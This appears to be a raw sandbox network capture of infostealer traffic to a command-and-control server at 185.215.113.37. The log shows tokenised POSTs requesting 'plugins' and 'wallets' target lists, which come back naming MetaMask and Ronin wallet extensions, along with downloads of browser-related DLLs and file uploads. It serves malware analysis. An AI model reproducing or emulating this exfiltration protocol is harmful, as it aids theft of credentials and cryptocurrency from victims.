Sep 26, 2024 18:27:03.743957996 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCB Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="message"fplugins------EGHJKFHJJJKJJJJKEHCB--
Sep 26, 2024 18:27:03.965451002 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 26, 2024 18:27:03.987111092 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHCGDGIEBKJKFHJJKFC Host: 185.215.113.37 Content-Length: 6871 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 18:27:03.987133980 CEST	6871	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 Data Ascii: ------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 26, 2024 18:27:04.836004972 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 18:27:05.137162924 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 18:27:05.356328011 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:05 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 26, 2024 18:27:05.356372118 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 26, 2024 18:27:06.715930939 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFI Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 18:27:07.450522900 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 18:27:07.610656977 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBG Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 18:27:08.331505060 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 18:27:08.417061090 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIJECAEGDHIDHJKKKKF Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IIIJECAEGDHIDHJKKKKFContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------IIIJECAEGDHIDHJKKKKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIIJECAEGDHIDHJKKKKFContent-Disposition: form-data; name="file"------IIIJECAEGDHIDHJKKKKF--
Sep 26, 2024 18:27:09.126981974 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 18:27:10.057334900 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEG Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="file"------GDBFHDHJKKJDHJJJJKEG--
Sep 26, 2024 18:27:10.781282902 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 18:27:11.189297915 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 18:27:11.407886028 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 26, 2024 18:27:12.410285950 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 18:27:12.656104088 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 26, 2024 18:27:13.180408001 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 18:27:13.399876118 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 26, 2024 18:27:13.825200081 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 18:27:14.045722008 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 26, 2024 18:27:16.464212894 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 18:27:16.695976019 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 26, 2024 18:27:17.111242056 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 18:27:17.350999117 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 26, 2024 18:27:18.121191025 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 18:27:19.020327091 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 18:27:19.175231934 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDB Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="message"wallets------DGHIDHCAAKECGCBFIJDB--
Sep 26, 2024 18:27:19.404495001 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:19 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 